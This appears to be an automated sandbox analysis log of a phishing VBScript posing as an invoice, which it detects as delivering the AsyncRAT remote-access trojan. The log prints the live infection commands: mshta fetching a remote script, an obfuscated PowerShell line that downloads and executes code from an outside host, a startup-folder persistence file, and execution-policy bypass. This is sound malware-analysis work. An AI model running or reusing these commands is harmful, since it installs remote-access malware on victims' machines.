                  Source: 9.2.aspnet_compiler.exe.400000.0.unpack, Client/Settings.cs | Base64 encoded string: 'jkzA9kYX2/J279kEM5pTk8Do0oQjvH1HBNgMyd2s/83fRjqf98xdZ7gcRHdtaERAk3anO0GY4/MhqSf12vIpbw==', 'QwtFOzaLUYf9WP6up5eTDY8hwr9YYFIUauetjROsO30Of/OtY9lZiyaAkqVWJ6YHXKMGYxLFitF1RGipWVxBM9eMlO92BOypewL4potPiAY=', 'zl+CnYj7GL49NMJx6erBe+3qxptrlXCYW1q/hc1MNEbnREGoYxkN0RLOL6p5jfFIxiHTuKGsAxqwD2a/jvlEWQ==', 'UHXkE6wCIQNgAoWJsiVVI4D25vgewTv36i8RvrVKvZRz/mbk5eBYqVU9/UVZ+5aAZWsrfmRGEY1DkWlaflGDjQ==', 'P4Ll7rC9+Am7AYck3jtBUe5XM5uML+MDdUCbq5vGoo7d8Sccms42hO6nYmVSxM/MlsLg6CddRztmlAOO34k3GjRgKDHWR+n1rMx051Rnucs=', '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', 'XbpaR9aT8DodKYibQiz2PndcCK2bYFnLWv6CW7QsR8WYpN5fpwkpAQHtBWjaYcjIHhezMoJSwfT/j4PmLEA3yg==', 'tgXpgZ4i0ketHFKLvjTO3WSXezgUac7LE8TAZXH+brG0Ey/zyn2f0AAmzmUIhF1hck7vyBOJV1j5LSUXe2dsRw=='
                  Source: 10.2.aspnet_compiler.exe.400000.0.unpack, Client/Settings.cs | Base64 encoded string: 'jkzA9kYX2/J279kEM5pTk8Do0oQjvH1HBNgMyd2s/83fRjqf98xdZ7gcRHdtaERAk3anO0GY4/MhqSf12vIpbw==', 'QwtFOzaLUYf9WP6up5eTDY8hwr9YYFIUauetjROsO30Of/OtY9lZiyaAkqVWJ6YHXKMGYxLFitF1RGipWVxBM9eMlO92BOypewL4potPiAY=', 'zl+CnYj7GL49NMJx6erBe+3qxptrlXCYW1q/hc1MNEbnREGoYxkN0RLOL6p5jfFIxiHTuKGsAxqwD2a/jvlEWQ==', 'UHXkE6wCIQNgAoWJsiVVI4D25vgewTv36i8RvrVKvZRz/mbk5eBYqVU9/UVZ+5aAZWsrfmRGEY1DkWlaflGDjQ==', 'P4Ll7rC9+Am7AYck3jtBUe5XM5uML+MDdUCbq5vGoo7d8Sccms42hO6nYmVSxM/MlsLg6CddRztmlAOO34k3GjRgKDHWR+n1rMx051Rnucs=', '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', 'XbpaR9aT8DodKYibQiz2PndcCK2bYFnLWv6CW7QsR8WYpN5fpwkpAQHtBWjaYcjIHhezMoJSwfT/j4PmLEA3yg==', 'tgXpgZ4i0ketHFKLvjTO3WSXezgUac7LE8TAZXH+brG0Ey/zyn2f0AAmzmUIhF1hck7vyBOJV1j5LSUXe2dsRw=='
                  Source: 9.2.aspnet_compiler.exe.400000.0.unpack, Client/Helper/Methods.cs | Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                  Source: 9.2.aspnet_compiler.exe.400000.0.unpack, Client/Helper/Methods.cs | Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: 10.2.aspnet_compiler.exe.400000.0.unpack, Client/Helper/Methods.cs | Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                  Source: 10.2.aspnet_compiler.exe.400000.0.unpack, Client/Helper/Methods.cs | Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: classification engine | Classification label: mal100.phis.troj.evad.winVBS@18/18@5/3
                  Source: C:\Windows\System32\mshta.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU
                  Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5880:120:WilError_01
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Mutant created: \Sessions\1\BaseNamedObjects\AsyncMutex_6SI8OkPnk
                  Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2932:120:WilError_01
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fsrdhrwr.o0u.ps1
                  Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\Invoice-ID-(882451).vbs'
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                  Source: C:\Windows\System32\wscript.exe | File read: C:\Users\user\Desktop\desktop.ini
                  Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                  Source: C:\Windows\System32\mshta.exe | File read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | File read: C:\Windows\System32\drivers\etc\hosts
                  Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\Invoice-ID-(882451).vbs'
                  Source: unknown | Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' http://ahmedadel.work/cairo/Encoding.txt
                  Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''http://ahmedadel.work/cairo/ALL.txt'')';$TC=I`E`X ($c1,$c4,$c3 -Join '')|I`E`X
                  Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: unknown | Process created: C:\Windows\SysWOW64\mshta.exe 'C:\Windows\SysWOW64\mshta.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Run.hta' {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
                  Source: unknown | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -windo 1 -noexit -exec bypass -file 'C:\Users\Public\Microsoft.ps1
                  Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -windo 1 -noexit -exec bypass -file C:\Users\Public\Microsoft.ps1
                  Source: unknown | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe #cmd
                  Source: unknown | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe #cmd
                  Source: unknown | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe #cmd
                  Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' http://ahmedadel.work/cairo/Encoding.txt
                  Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''http://ahmedadel.work/cairo/ALL.txt'')';$TC=I`E`X ($c1,$c4,$c3 -Join '')|I`E`X
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -windo 1 -noexit -exec bypass -file C:\Users\Public\Microsoft.ps1
                  Source: C:\Windows\SysWOW64\mshta.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -windo 1 -noexit -exec bypass -file 'C:\Users\Public\Microsoft.ps1
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe #cmd
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe #cmd
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe #cmd
                  Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
                  Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
                  Source: Window Recorder | Window detected: More than 3 window changes detected
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                  Source: Binary string: HBAR.pdb81 source: powershell.exe, 00000005.00000002.912905645.000000000B2F1000.00000004.00000001.sdmp
                  Source: Binary string: HBAR.pdb source: powershell.exe, 00000005.00000002.912905645.000000000B2F1000.00000004.00000001.sdmp

                  Data Obfuscation:

                  VBScript performs obfuscated calls to suspicious functions
                  Source: C:\Windows\System32\wscript.exe | Anti Malware Scan Interface: .Run hhhbbaannkeerrss , 0IWshShell3.Run("C:\Windows\System32\mshta http://ahmedadel.work/cairo/Encoding.txt", "0")
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_0715BE80 push es; ret 5_2_0715BE96

                  Boot Survival:

                  Yara detected AsyncRAT
                  Source: Yara match | File source: 00000009.00000002.901879167.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000005.00000002.912905645.000000000B2F1000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000005.00000002.913434202.000000000B780000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000005.00000003.745955068.0000000005B56000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara match | File source: 0000000A.00000002.762757327.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: aspnet_compiler.exe PID: 1296, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: powershell.exe PID: 5764, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: aspnet_compiler.exe PID: 3544, type: MEMORY
                  Source: Yara match | File source: 5.3.powershell.exe.5bcd1ec.1.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 10.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 5.2.powershell.exe.b670778.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 5.2.powershell.exe.b6827bc.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 9.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 5.3.powershell.exe.5bcd1ec.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 5.3.powershell.exe.5bbb094.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 5.2.powershell.exe.b6827bc.6.unpack, type: UNPACKEDPE
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Run.hta
                  Source: C:\Windows\System32\mshta.exe | Registry key monitored for changes: HKEY_CURRENT_USER_Classes
                  Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\mshta.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\mshta.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
